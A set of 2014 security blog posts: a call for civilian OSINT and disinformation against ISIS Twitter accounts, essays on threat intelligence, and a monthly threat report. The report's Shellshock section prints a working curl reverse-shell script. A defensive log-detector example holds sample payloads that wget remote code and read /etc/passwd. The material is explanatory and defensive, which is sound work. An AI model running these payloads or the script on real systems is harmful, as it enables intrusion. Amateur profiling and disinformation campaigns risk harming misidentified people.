Of course what I would call trolling is not what I am seeing out of the Department of State’s account at all. I am seeing reasoned arguments that are aimed at unreasonable individuals or those who may have some mental issues that need addressing. By being logical and refuting the call to this particular type of jihad you are just going to maybe get a lock on the rational individuals. However, Daesh wants only the cream of the crop in the whacknuttery department to join their ranks or to self radicalize and act out their fantasies here in the West. Much like I would assume the attacker from yesterday in Canada did with his shootem up at the capitol.

Frankly, I have no solid answers on how to respond to all of this. I would love to see some plans in action that would stem the tide here and perhaps staunch the flow of propaganda and jihad on Twitter. So far the only thing I can come up with is what you will see below for those who are either interested in watching the great game at a larger scale or perhaps to get inside of it a little more and work towards some asymmetric solutions. Perhaps the likes of Anonymous and others would truly “Troll” these players and drive them to drink, spending more time wasting time setting up accounts than actually placing their crap online.

… Just a thought…

On the other end of the spectrum, this will be a little primer on how you might use some tools to get closer to these guys. By getting closer I mean more on the HUMINT side of the house, because as we are seeing they are learning that their metadata is on the Twitter as well. A recent manual that came out from Daesh instructed the brothers on how to stamp out their metadata and specifically called out the fact that geotags had been a problem. Well, as you can see at the top of this post, yes, this is a problem for them. However, I would posit that unless you are watching them real time somewhere in the bowels of Twitter HQ, the latency issue becomes a key factor in whether or not we can send a drone and a hell-fire up their asses.


Clearly they are learning from their mistakes and it seems of late that the Bellingcat is out of the bag here with regard to things like looking near real time at their metadata through their posting of images and tweets from places like Raqqa and elsewhere. It was this manual that prompted the post you are reading now in fact. After looking at all the data and seeing the immensity of the accounts online now that are jihadi related, I think that it’s just too much for the government to handle. For that matter I think it is certainly too much for the private companies to handle as well, and once you come to that conclusion you then have to think about how well they don’t all talk to each other. In the end there is a morass out there and for all intents and purposes today, from what I have seen, the government has no idea what to do about it. There’s just too much noise to even get the signal and soft trolling is just pathetic.

Recon

So it comes to this, I have decided that the best way of creating some tension that might cause pain to the Daesh is to give you all a taste of recon and OSINT on the Daesh. There are many tools out there you can work with and certainly there are fools with tools out there but I would like to see some smarter approaches here. So here goes…

Some tools:

  • Recon-ng
  • Mentionmap
  • Maltego
  • twiangulate
  • twtrland
  • EXIF tools (online and off)
    • regex.info
    • Foca
    • A raft of other command line tools in live distros for forensics

It’s a toolbox really and you put the right tools in there that you like and do the job. I am sure you all out there have others you like. These are just a few of the ones I use daily for my fun and games. Lately though I have been leveraging Recon-ng for their twitter features and will be expanding even further into the youtubes and other modules that they have for this kind of work. Suffice to say that you can really profile people on Twitter for example with just this tool alone. Below are some of my outputs for you to see.

Supporter in Raqqa tweeting 10.17.2014; Recon-ng output for a user on Twitter who is a player within Daesh and is in Syria

Another user, logging their connections including their DM connections

A map of a user and who they talk to/mention with frequency, as well as hashtags

Supporter in Raqqa tweeting 10.17.2014

All of this data is pretty easy to get once you have the right tool sets and a good place to start looking. I leveraged a couple of accounts that I knew of (Adam Gadahn and Juni Al Britani) but you can use others. I will say though, once you start spidering out you will see a flood of accounts out there that are like-minded. The trick though is to locate all those users in country who are real players in the Daesh palooza, and this is where you have the analysis phase of the game. As I have said in my posts about Threat Intelligence, it’s all about the analysis and product. If you don’t carry out the analysis well it all means nothing.

PS.. if you don’t know the tools go learn. I am not here to teach you how to use them. Buy the ticket… Take the ride.

Analysis

Analysis of the data here is the part of the cycle that takes a human being. Someone who can make connections as well as verify them. Tools are great but there are many fools with tools out there as I said above so if you use the tool but you fail in the analysis then you will give bad data in the form of connections that are incorrect. In the case of the Twitter jihad you have to have some idea of who you are dealing with. Are you in fact dealing with a real player who is in Raqqa or Ramadi or are you dealing with a wannabe in the US? You have to actually look at all the traffic, understand the language, and the psyche to make any real headway here. Just grabbing user names won’t do and it certainly won’t do if you cannot even Google translate a bit of the language to even have an idea of what is going on.

By analysis of the connections and reading the tweets you can then react appropriately by:

  1. Passively collecting intelligence
  2. Actively collecting intelligence
  3. Actively degrading their activities through disinformation operations
  4. Actively reporting their activities to authorities (thus degrading their capacities through blocks)

I am advocating all of these things now because this is just Twitter. This stuff is public to begin with and as such it is not like they are planning operational details through Twitter. They are instead advertising really and that to me is up for grabs for the common folk on the internet to attack. I am sure some out there will have a hissy about all of this (Flashpoint, lookin at you Evan you dickweed) but I don’t give a crap. This stuff is just polluting the weak minded and any way to stop it in my book is sauce for the gander.

If you are going to do this then you had best learn OSINT and intelligence analysis. If you want to just scrape names and pass them to Twitter to block, fine, but at least give them the real players and not some hapless reporter ok? Do the work, learn the tools and make a difference.

Asymmetric Response

So what I say to you all out there is pick your plan and go with it. Give the Daesh a pain in the ass. I know that in the past Anons have been threatening all-out war on the jihadis on Twitter and I have seen a bunch of nothing come of it. Doxing these guys will only work if they are in the US or another country where they can be picked up. I do fully support the idea though that if you are going to do this then you report them to the authorities. Drop the FBI a dump of accts and maybe some of these guys/girls can get picked up before they pull a stunt like we have seen, from beheadings to mass shootings.

The government’s trolling is not working and it seems that more and more of these accounts keep popping up. I mean hell, Juni’s on his 103rd acct right?

Derp.

Just do a good job.. No half ass attempts.. And remember.. I am watching you Daeshbags!

K.

Written by Krypt3ia

2014/10/23 at 13:24

The Threat Intelligence Cycle and YOU

with 2 comments


The Cost Benefit Analysis of Threat Intelligence:

Over the weekend I got a call from @packetknife, who began to question me on some of the finer points of the threat intelligence post I put up recently. The primary thing boiled down to “So what’s the cost benefit analysis here?”, which was not meant in terms of money but of overall efficacy. What real good would come from having a threat intelligence capability, one that could be more broadly expanded to such things as competitive intelligence and the like?

It was a good question and it is something I had talked about before in my BSidesLV presentation on this subject. To cut to the chase, the point is this: if you create the capacity and you generate intelligence from analysis of the “data” being handed to you as well as what you are seeing in your own logs, then you have analysis and information that can be used to inform management. Management may not be aware of these things, and they should be in today’s age of the weekly compromise announcement. Business decisions concerning the security of a company are made every day, and all too often, as we have seen lately, those decisions were not the best for the security of the companies found to be compromised and losing data. Examples would be Home Depot relying on SEP 11 (Symantec Endpoint Protection 11) as its primary protection against malware or, at a smaller scale, the use of MalwareBytes by the heating and cooling contractor that was the launch point for the attack on Target.

There is a cost benefit to having your own program for looking at the data as well as the so-called intelligence you can get from a portal, and that benefit lies not only in technical measures (i.e. blocks in firewalls and signatures in the SIEM) but also in awareness on the part of the org and its leaders as to what is happening in the world and how that may affect the organization. Of course your leaders have to be receptive to this kind of thing, and most of the time it has to be spoon fed to them, but if you get those things squared away you will make your life a little easier when defending the organization, because they will have some clue as to why you are warning about something.

Rubber Meeting Road:

Some *cough Ali cough* might question whether this is something anyone other than a government or perhaps a defense industrial base corporation would care about. I agree it may be a tough sell at times, but I have no doubt that some form of this program benefits any corporation with a security presence. I am not saying you need to hire more bodies and form a group dedicated solely to this function (though that would be nice); I am saying the function at least has to exist in some working fashion for your security program to work as a whole. Without these insights you are only ever reactive, never proactive, and that is bad.

If you really look at this, you are not just reporting on what is going on in the world but also enlightening your management about your own environment. If you, say, run a scan on your network and locate five Windows NT machines that perform rather important functions within the business, you should generate intelligence stating that the network is at risk because NT, an outdated and unpatched system, is still there. Additionally, your analysis would add the context that those very important systems, were they to fall down and go boom or be hacked, could cause major problems for the company. Now, do you get that from vuln scans? Yes, you do. But do those scans ever make it to management in the first place? And do they carry any analysis as to WHY this is such an important issue?

See where I am going here? The scan is DATA but the analysis is INTELLIGENCE…

Adding analysis that marries what is vulnerable in your environment with why it is there, what the potential problems are if it remains so, and what current attacks out there may be going after such things: that is “Threat Intelligence”. Am I making sense here? Threat Intelligence (now “TI” in the vernacular, as I see in my Twitter feed) is the sum total of your scans, your feeds, and your intelligence gathering, internal and external, used to inform your business. Once you have informed them, it is up to them to accept the vulnerabilities they now comprehend. Delivering that comprehension is what you are doing in the form of TI.

Whether companies and management will buy into it is really the key part of the problem. I personally found that I had to take a page out of Jayson Street’s book and just do it. I created reports and sent them to management. Once they got the spoon-fed, fifth-grade reading level informatics of what was going on, the light bulb turned on. Does this mean they act on the larger issues that should be taken care of? No, it doesn’t. However, I have informed them and I keep them up to date on their overall security posture, and at the end of the day that is all I can ask. It is, after all, their business. I only inform…

Your mileage may vary.

K.

Written by Krypt3ia

2014/10/13 at 15:40

The Threat Intelligence Cycle

with one comment


Nomenclature:

Lately I have been seeing more people come to the realization that all of the threat intelligence for sale from vendors may or may not be what it claims to be. I for one think that much of what is out there today is either of poor quality or mostly not relevant to the users buying the data. It’s that last point that I most often try to get across through this blog and elsewhere. To wit: most of the time what you are being offered by these threat intelligence firms is data, not necessarily intelligence, and this is a nomenclature issue that I think is important.

Intelligence, by definition, is this:

[screenshot of the definition of “intelligence”]

Meanwhile, intelligence requires analysis to make sense of all that data:

[screenshot of the definition of intelligence analysis]

http://en.wikipedia.org/wiki/Intelligence_analysis

Often what you get from an intelligence portal is data and analysis on actors you may never have to deal with and who are not targeting you. Data that comes from honeypots, and perhaps from incidents at other clients, but those clients and that data may not be in your vertical, so what bearing do they have on you? Another question to ask is whether the intelligence analysis was carried out by a trained intelligence analyst at all. Often today we see intelligence output that is flawed because of poor data or suppositions built on bad attribution and other factors. So how much can you trust that intelligence report to begin with, and secondly, does the information even have relevance to your organization or network infrastructure?

Once again the militarization of the internet and the information security field has led us astray with nomenclature that sounds cool but may not really fit the needs of INFOSEC outside a military or government sphere of influence. Now that you have some idea of the nomenclature issues, I would like to take up the notion that what most of you get from so-called threat intelligence outfits is really just data and not so much intelligence.

Data Versus Intelligence:

When you buy into a threat intel feed you mostly get emails with data: command and control IPs, malware hashes, and the like. You may have a portal where you can look up specific actors (CrowdStrike, for example) and get a sense of who they are and how they operate, but really, do most of you digest that data and use it to inform your management or the direction of your security program? On average I would say the bulk of what companies do today is take C&C or bad-actor data and drop it into their own IDS or firewall rules to try to stop those attacks. That is not intelligence consumption; that is data consumption.

A YARA rule or other TTP data is just that: data. You could throw away the rest of the report (which I assume many do) and move on. Intelligence has consumers, and it has to be created for that consumer. If you are a financial institution and your threat intelligence feed does not cover crimeware that steals credit card data, how much good is it to you? Don’t get me wrong, having that data to put into your IDS or firewall as proactive prophylaxis is great. Still, it is not intelligence. So I say again: most of what you are buying is not true intelligence unless you get a tailored report for your company that covers data from your environment as well as information about the actors who have attacked it or would wish to. That direct information is what helps management and staff make decisions on the direction of security and on the threats to the environment that need to be addressed.

Good Intelligence Versus Bad Intelligence:

Next I would like to tackle the question of when intelligence is bad and when it is good. Intelligence analysis is never easy and it is never one hundred percent accurate. A simple example would be the conversation between former CIA director George Tenet and former President G.W. Bush regarding Saddam’s WMDs.

“George, how confident are you?” the president asked Tenet, in an exchange depicted in Bob Woodward’s book “Plan of Attack.”

“Don’t worry, it’s a slam-dunk,” Tenet said.

Well, there were no WMDs, and the intelligence came from the WHIG (White House Iraq Group), which was run and lorded over by Vice President Dick Cheney. Intelligence can be misguided, or it can be deliberately led astray to influence decision makers, and the same is true of threat intelligence in the infosec world. In this post, though, we are talking about intelligence on actors who may be known only from very small bits of data in code or from IP addresses used in the attacks. This attributional data is what many threat intelligence firms hang their hats on, and the reality is that IP attribution is highly dubious given the nature of the internet to start with. There are no slam dunks here, no matter what a provider tells you about a specific actor they have been watching.

So when you buy into a program for intelligence you have to look at it from the following perspectives;

  1. Does the threat intelligence firm have a feed from your systems? (i.e. log correlation)
  2. Do they know your business?
  3. Do they know how you operate day to day technically?
  4. Do they cover more than just APT actors? (i.e. teh sexy)
  5. Do they give you a report every month on actors that specifically would be interested in your business?
  6. Do they give you a report that is tailored to your environment with your vulnerabilities?

If your threat intelligence vendor does not give you these things then I would say you are not getting “Threat Intelligence”, at least none you can really use. What you are getting is “data” that you can use as a tactical tool to proactively block certain attacks and maybe some actors. Mostly what I want to say to you is that I have a little aphorism that I love, and it is this:

“A fool with a tool is still a fool”

There are many tools out there that call themselves threat intelligence firms and there are many fools out there who gladly use those tools without any real effect in securing their environments. I am planning on a post later on about the issues around intelligence gathering and analysis. This is a large topic and I think it best be something stand alone for you all to look at. I just wanted to give you all the main idea here that what you are all buying isn’t really intelligence.

“Caveat Emptor” people.

The Intelligence Cycle:

Let’s talk about the intelligence cycle for a bit, now that we have gone over some of the misapprehensions out there about threat intelligence. You, the consumer of this information, should have a goal or benefit in mind for paying for the service, right? Well, unless you have a team that can digest the information, or alternatively a vendor who writes reports that execs can read and understand about the threats to their company, it will all be Greek to you. So to understand this better you need to understand the intelligence cycle itself.

Below are the precepts of intelligence as a cyclical practice to first understand the problems you have, then collect data, analyse it, and then report on the threats.

  • Setting Objectives
  • Information Collection
  • Data Analysis
  • Analysis and Reporting
  • Threat Assessment (aka) A Threat Intelligence Assessment


Can you in fact count on your vendor to be using this cycle to identify the threats to you? I find that usually this is not what they do as I said above. This means that you and your org have to create your own team or buy into a vendor who will do all of these things for you. Without this all of the data being thrown at you is just data without real context and that certainly would be the case without people in your environment making sense of the data and responding to it appropriately for your organization.

Next Generation Threat Intelligence:

Well, I have explained the nature of intelligence and the cycle as well as touched on what bad intelligence is as well as just plain old data. Now though I would like to cover the idea of what I see as the next generation of threat intelligence. As I said above, unless a firm is selling the full package and has a lot of insight into your business and infrastructure you need to create your own intelligence function inside your Information Security infrastructure.

What this really means is that you will have to get some people and some resources to collect data on your environment and what you are seeing. You can then augment this with feeds from outside vendors and use it all to synthesize an analysis tailored to your org. Once you do this and have a functioning intelligence function, you can be proactive about threats seen in the wild as well as those you see coming directly at you.

Carry out the following functions:

  • In-House Data Collection
  • Augmentation With Outside Data and Intelligence Analysis
  • True Threat Intelligence Using YOUR Data and Shared Resources
  • Identifying Threats To YOUR Environment
  • Reporting

Some large banks (BofA, for instance) have their own intelligence wings that purportedly not only take feeds from the CrowdStrikes of the world but also use other OSINT techniques. These groups also use human assets and behavioural modelling to generate reports on threats out in the real world that may directly affect them. This is another level of intelligence gathering that you may also want to take up later on. First, though, if you are going to say you are using threat intelligence then you had better have one of the two scenarios above. Otherwise you are not using threat intelligence at all; you are just floundering in a sea of data that may or may not pertain to you.

My recommendation to you all is that you consider setting up a group that does this. If you have feeds then have people in that portal looking at all of the data that they have. Look at how actors operate and who they target. Perhaps there are things you can intuit from their reports. However, the big goal here is to work with YOUR environment. The phrase “Know Thyself” comes to mind here and it would be a true statement on what you should be working towards in threat intelligence.
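As an added example (my own illustration, not code from this post or from any vendor), here is the “the scan is DATA but the analysis is INTELLIGENCE” point made in the post above, and the in-house collection plus outside augmentation functions listed here, carried through in Python. The scan findings, asset inventory, feed entries and scoring weights are all constructed and assumed for illustration; the technique is the join between the three sources and the rationale each ranked finding carries into the report that goes to management.

```python
"""Turn raw vulnerability-scan DATA into prioritised INTELLIGENCE by joining it
with asset context (business knowledge) and an outside threat feed.

Added example, not code from Krypt3ia. Every host, asset, feed entry and
weight below is constructed for illustration."""

# --- In-house data: raw output of a vulnerability scan (constructed sample) ---
SCAN_FINDINGS = [
    {"host": "10.0.0.5",  "cve": "CVE-2014-6271", "service": "http/cgi-bin"},
    {"host": "10.0.0.9",  "cve": "CVE-2014-6271", "service": "ssh"},
    {"host": "10.0.0.7",  "cve": "CVE-2014-3566", "service": "https"},
    {"host": "10.0.0.42", "cve": "CVE-2014-6271", "service": "http/cgi-bin"},
]

# --- Business context: the asset inventory (constructed sample) ---
ASSETS = {
    "10.0.0.5": {"name": "payroll-web", "owner": "Finance", "internet_facing": True,  "criticality": 3},
    "10.0.0.9": {"name": "dev-sandbox", "owner": "IT",      "internet_facing": False, "criticality": 1},
    "10.0.0.7": {"name": "vpn-gw",      "owner": "IT",      "internet_facing": True,  "criticality": 3},
    # 10.0.0.42 is deliberately absent: an inventory gap the analysis must surface
}

# --- Outside data: what a vendor feed might say about each CVE (constructed sample) ---
THREAT_FEED = {
    "CVE-2014-6271": {"cvss": 10.0, "exploited_in_wild": True,  "note": "Shellshock, mass scanning observed"},
    "CVE-2014-3566": {"cvss": 4.3,  "exploited_in_wild": False, "note": "POODLE, needs a MITM position"},
}

DEFAULT_CRITICALITY = 2   # assumed weight for hosts the inventory does not know about
EXPOSURE_WEIGHT = 1.5     # assumed multiplier for internet-facing assets
EXPLOITED_WEIGHT = 1.5    # assumed multiplier when the feed reports in-the-wild exploitation


def score_finding(finding, assets, feed):
    """Join one scan finding with asset context and feed data into a ranked record with a rationale."""
    asset = assets.get(finding["host"])
    intel = feed.get(finding["cve"], {"cvss": 5.0, "exploited_in_wild": False, "note": "not in feed"})
    rationale = []

    criticality = asset["criticality"] if asset else DEFAULT_CRITICALITY
    score = intel["cvss"] * criticality
    if asset is None:
        rationale.append("host not in asset inventory (unknown owner, unknown exposure)")
    elif asset["internet_facing"]:
        score *= EXPOSURE_WEIGHT
        rationale.append("internet facing")
    if intel["exploited_in_wild"]:
        score *= EXPLOITED_WEIGHT
        rationale.append("actively exploited in the wild")
    rationale.append(intel["note"])
    return {
        "host": finding["host"],
        "asset": asset["name"] if asset else "UNKNOWN",
        "owner": asset["owner"] if asset else "UNKNOWN",
        "cve": finding["cve"],
        "score": round(score, 1),
        "rationale": "; ".join(rationale),
    }


def prioritise(findings, assets, feed):
    """Rank findings highest risk first. The ordering plus the rationale is the intelligence."""
    return sorted((score_finding(f, assets, feed) for f in findings),
                  key=lambda r: r["score"], reverse=True)


def render_report(ranked):
    """Management-readable summary: one line per finding, highest priority first."""
    lines = ["Priority  Host         Asset        Owner    CVE             Score  Why"]
    for i, r in enumerate(ranked, 1):
        lines.append(f"{i:<9} {r['host']:<12} {r['asset']:<12} {r['owner']:<8} "
                     f"{r['cve']:<15} {r['score']:<6} {r['rationale']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_report(prioritise(SCAN_FINDINGS, ASSETS, THREAT_FEED)))
```

Note what the join does that the raw scan cannot: the host missing from the inventory (10.0.0.42) outranks a known, low-value sandbox with the same CVE, and the report says why, which is the question management will ask first.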

 Conclusion:

Well there you have it. I have had this running around my mind for a while now and lacked the motivation to post until today. I hope this is helpful to some of you and I am sure there are some people out there who may take issue with some of what I said (mostly vendors I am assuming) but it had to be said. While it all may sound sexy and full of intrigue there is also a lot of snake oil as well. Unless you understand the goals of what you are buying into you just end up wasting your time and money.

Frankly I have seen so many orgs out there who lack even the capacity to have effective security awareness programs so I have little hope that any of them would be able to cobble together a real intelligence function. All too many places just want the check box of “YUP! I HAVE A THREAT INTELLIGENCE FEED! I AM SOOPER COOL” and it saddens me. Ok, no, wait.. It really enrages me most of the time as many of you may already see in my Twitter feed daily. I guess maybe that’s all well and good for them but for me this is just wasting time and money. If you want to protect your org then you should be doing things that make more sense than buying bad intel and a yara feed.

Don’t even get me started on all the vendors’ super cute names for their actors and how they don’t share intel with each other. That will only make me even more rage filled, I am sure. Of late I have been told I need to start a service to teach the intelligence cycle and all of the things that pertain to running a good program. It is something I am considering but there has to be a desire out there. On average I am not seeing too many orgs outside the big defense industrial base types who care enough to do it right. Don’t get me wrong though, I don’t think this has to be a big spend either. In fact I think many places could just drop their very expensive threat intelligence feeds and buy an IDS, set up a team, and do all this work more effectively themselves.

*heresy huh?*

Think about it. More later on the pitfalls of intelligence analysis and cognitive bias.

K.

Written by Krypt3ia

2014/10/02 at 20:14

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

leave a comment »


GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

EXECUTIVE SUMMARY

During September 2014 a number of incidents were reported, along with stories of malware and crimeware. None of them, however, compares in scope and threat to the bash bug disclosed for UNIX and Linux systems across the internet. The “Shellshock” bash vulnerability was disclosed on Wednesday 9/24/2014, and within a short time the internet was abuzz with alerts that all *NIX systems were vulnerable to it.

The bash bug is a real and present danger to misconfigured systems as well as to those with the proper security features enabled. This is because once the bug is exploited the attacker can run further code to exploit the system and compromise the machine. A fuller discussion of this bug and its import can be found below.

In other areas the global threat level is constant, but with this new bash vulnerability and the issues surrounding its remediation, the THREATCON LEVEL for this month, post release of the Shellshock bug, is HIGH.

GLOBAL THREATS

SHELLSHOCK:

Shellshock, at its heart, is a bug in the way the bash shell parses function definitions passed to it through environment variables. bash is the most common “command processor” on the UNIX and Linux systems we have today. When a function definition is exported in the environment, bash’s parser does not stop at the end of the function body but keeps going and executes whatever commands follow it, which allows arbitrary code to run whenever an attacker controls an environment variable that a bash process inherits.

CVE-2014-6271: This is the original “Shellshock” Bash bug. When most people refer to the Bash bug or “Shellshock”, they are most likely talking about this CVE.

CVE-2014-7169: This is the CVE assigned to the incomplete patch for the original bug.

The original patch was found to be incomplete shortly after the vulnerability was publicly disclosed. A variation on the original malicious syntax may allow an attacker to perform unauthorized actions including writing to arbitrary files.

CVE-2014-7186 & CVE-2014-7187: These two CVEs are for bugs discovered in relation to the original Bash bug. These two bugs are triggered by syntax that is very similar to the original Bash bug, but instead of command injection, they allow for out of bounds memory access. There is currently no proof that these bugs have remote vectors and they have not been seen in the wild.

CVE-2014-6277 & CVE-2014-6278: Security researcher Michal Zalewski discovered two additional bugs. These are believed to allow arbitrary command injection similar to the original Bash bug; however, details have not yet been made public, in order to give vendors time to create the appropriate patches.

ANALYSIS:

The primary issue with this vulnerability is simply this:

The bug allows code to be run on any internet-connected system by anyone who can get attacker-controlled data into an environment variable that bash reads. In practice that means every website running CGI scripts on UNIX/Linux (the web server copies request headers such as User-Agent into the CGI environment), as well as any appliance (routers and other types) with a web-based or shell interface through which such data can be passed.

This means that even a locked-down system can be made to run attacker-supplied commands if such an interface is reachable. An example that should impress the danger upon you: with the right payload against a vulnerable CGI script, an attacker can open a reverse connection (a shell session) from your machine back to theirs with some very simple code.

Example Code:

#!/bin/bash
echo "little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva"

# step 1 (on the attacker box): nc -lp 8080 -vvv
# step 2: ./little-shellshock-reverse.sh <listener IP> <target host>
#   $1 = IP of the box running the nc listener, $2 = host serving the vulnerable CGI script

# The User-Agent is exported into the CGI environment; a vulnerable bash parses the
# function definition "() { foo;}" and then keeps going, running the commands after it.
# The leading "echo" emits the blank line that ends the CGI response headers.
/usr/bin/curl -A "() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1" "http://$2/cgi-bin/test.cgi"

Once this has run you will have a connection into that machine and can exploit it further, remotely, at your leisure. Additionally, given the nature of the bug and the variety of code paths that could be exploited, we are still unsure of just where the boundaries of attacks using this vulnerability are.

Applying vendor patches is the primary fix, and to date more patches are being released every day from large and small vendors to fix the parser and stop the bug. However, you have to be vigilant: seek out every system in your environment that has bash as its shell and ensure it can be patched. In some cases there may be no patch to apply because the system is out of date and the vendor may not even exist any more.

This bug has already been reported in use in the wild by APT actors, and there is now malware that uses it to seek out and exploit machines automatically. If you have not yet begun assessing all of your assets, both internal and external, you should do so as soon as possible. IDS signatures can now detect this exploit, but unless the traffic is blocked at the network level by an IPS you may already be compromised without being aware of it.
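Detection logic for the delivery vector described above, as an added example (not part of the original report and not from any IDS vendor): the web server copies request headers into the CGI environment, so the same “() {” trigger that bash looks for shows up in the access log. The log lines are constructed samples in combined log format using RFC 5737 test addresses; the payloads in them are illustrative.

```python
"""Find Shellshock (CVE-2014-6271) exploitation attempts in web server access logs.

Added example, not code from the original report. The log lines are constructed
samples in Apache/nginx "combined" format; nothing here is from a real incident."""
import re
from urllib.parse import unquote

# The trigger bash looks for when importing a function from the environment:
# "()" followed by "{". Whitespace between them is optional, so match loosely.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log: two attempts via User-Agent and Referer, one percent-encoded
# attempt in the query string, and two benign requests (one with braces in the agent).
SAMPLE_LOG = r'''
198.51.100.23 - - [25/Sep/2014:08:09:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.5/x -O /tmp/x; sh /tmp/x'"
198.51.100.23 - - [25/Sep/2014:08:09:18 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 500 0 "() {:;}; /bin/cat /etc/passwd" "Mozilla/5.0"
192.0.2.77 - - [25/Sep/2014:08:10:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
192.0.2.78 - - [25/Sep/2014:08:10:40 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 300 "-" "curl/7.37.0"
192.0.2.79 - - [25/Sep/2014:08:11:00 +0000] "POST /api/v1/items HTTP/1.1" 201 64 "-" "app/1.0 (config={})"
'''.strip().splitlines()


def parse_combined(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(lines):
    """Return one hit per (line, field) in which a Shellshock trigger appears.

    Any client-controlled field that a CGI server exports into the environment
    (User-Agent, Referer, the query string, ...) is a delivery vector, so every
    such field is checked, both raw and percent-decoded."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("request", "referer", "agent"):
            value = rec[field]
            if SHELLSHOCK_RE.search(value) or SHELLSHOCK_RE.search(unquote(value)):
                hits.append({"ip": rec["ip"], "time": rec["time"], "field": field, "value": value})
    return hits


if __name__ == "__main__":
    for h in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} via {h['field']}: {h['value']}")
```

A hit in the log only tells you an attempt reached the server; whether the CGI script ran under a vulnerable bash is a separate question, which is why the status code and the host’s patch state belong next to each hit in the write-up.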

Links:

http://www.technologyreview.com/view/531286/why-the-shellshock-bug-is-worse-than-heartbleed/

http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/29/the-internet-is-still-shellshocked-by-latest-bug-but-it-wont-be-the-last/

http://www.wired.com/2014/09/shellshocked-bash/

Incidents:

Supervalu Reports Second Hacking Incident:

Supervalu, a grocery chain, has reported a second compromise of its payment systems this September. The first was reported in August; the second appears to be unrelated to the first incident and group.

Both attacks targeted the POS (Point Of Sale) systems within the stores; the number of cards affected has not yet been released by Supervalu or the authorities.

ANALYSIS:

POS systems are notorious for being insecure. The reasons stem not only from the fact that the POS software is often installed on computers running outdated Windows XP but also from the fact that card data passes through the terminal’s memory in the clear before it is encrypted for transmission.

RAM scrapers are simple pieces of malware that sit in the memory of the POS system and copy the card data as it is swiped by the consumer at the terminal. This weakness is not new and has been leveraged by the carders carrying out these attacks. The attacks will continue until the POS terminals are secured at the application level and/or the more secure EMV “Chip and PIN” cards are rolled out in the US as they already have been in the EU.

Links:

http://online.wsj.com/articles/customers-data-may-have-been-hacked-at-albertsons-acme-stores-1412027253

http://www.cbsnews.com/news/new-hack-attack-at-albertsons-supervalu-stores/

http://www.wired.com/2014/09/ram-scrapers-how-they-work/

“The Fappening”: (Celebrity Nudes Hacked from iCloud)

In August the release of nude photographs of famous women caused a sensation online and in the news media. The photos and videos were all stolen from Apple’s iCloud service, which iPhones and iPads use for backup. The FBI has begun an investigation into the hacking incident and into the attackers who not only broke into the iCloud accounts but also released the photos online as a breach of privacy.

ANALYSIS:

The “Fappening”, as the incident was named on Reddit and other sites, shows just how vulnerable we all are where technology is concerned. We all assume at some point that the data (i.e. photos and videos) we upload is safe in cloud storage because companies like Apple are doing their due diligence in protecting that content. This incident shows that may not always be the case and that your private and intimate data may be open to anyone who can brute force a password.

The same applies to any data a company places in the cloud for safe keeping. It is important to consider the privacy and security of all data that a company or an individual creates or allows you to hold for them. Any company holding data, or letting its data be held, should take pains to ensure due diligence on privacy and security. The Fappening is a cautionary tale of where this all went wrong.

http://www.nytimes.com/2014/09/03/technology/trove-of-nude-photos-sparks-debate-over-online-behavior.html?_r=0

http://www.independent.co.uk/life-style/gadgets-and-tech/news/the-fappening-after-the-third-wave-of-leaked-celebrity-photos-why-cant-we-stop-it-9763528.html

CRIMEWARE AND MALWARE

FBI Opens Malware Investigator Portal to Industry:

The FBI has opened its malware analysis portal to private industry. The site is one of many information-sharing arrangements that the government and private entities will be creating to help in the fight against malware and criminal activity. The portal will have malware samples, data on attacks, and signatures to use in identifying attacks and attacker characteristics.

The portal will also have a feature, like Malwr.com and Cuckoo Sandbox, where you can upload a suspect file and have it run in a sandbox session to determine whether it is malware and what it does once it infects a system.

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

ANALYSIS:

Malware analysis is an important part of today’s information security program. Relying on technologies like antivirus alone is hubris; it should be augmented with analysts who can test suspect files and links to determine whether they are a threat to the environment.

AV products are often behind the curve where current malware is concerned, and tools like Cuckoo and Malwr.com are integral to a functioning IR (Incident Response) program at any company. The FBI allowing use of its portal also adds value for the FBI, since it gets live intelligence on potentially unseen malware from the user base.

Home Depot Reportedly Hit by New Malware In Recent Hack:

Home Depot reported in August that it had been hacked and that its POS (Point Of Sale) systems were targeted. The intrusion went undetected for about five months, and in that time the carders made off with approximately 56 million credit card numbers and attendant data.

On September 14th, though, the United States Secret Service reported that the malware used in this attack was a new variant never seen before, which they named “Mozart”. Others, however, claim the malware is in fact the same BlackPOS malware used in the Target hack, which also stole large numbers of credit cards from that retailer’s stores last year.

ANALYSIS:

The malware used in the attack on Home Depot is definitely linked to the Lampeduza collective, which carried out the attack on Target and the sale of the Target data. Within the strings of the malware there are direct connections to the Lampeduza crew, up to and including references to Libya and Ukraine and to American meddling in those regions.

This sentiment is echoed on the sites affiliated with the Lampeduza group, along with a penchant for Libya and the late Muammar Khaddafi. Another factor is that the malware functioned identically to the BlackPOS malware used against Target.

http://online.wsj.com/articles/home-depot-was-hacked-by-previously-unseen-mozart-malware-1411605219

http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/

APT ACTIVITIES

Chinese Target Hong Kong Protesters iPhones with Malware:

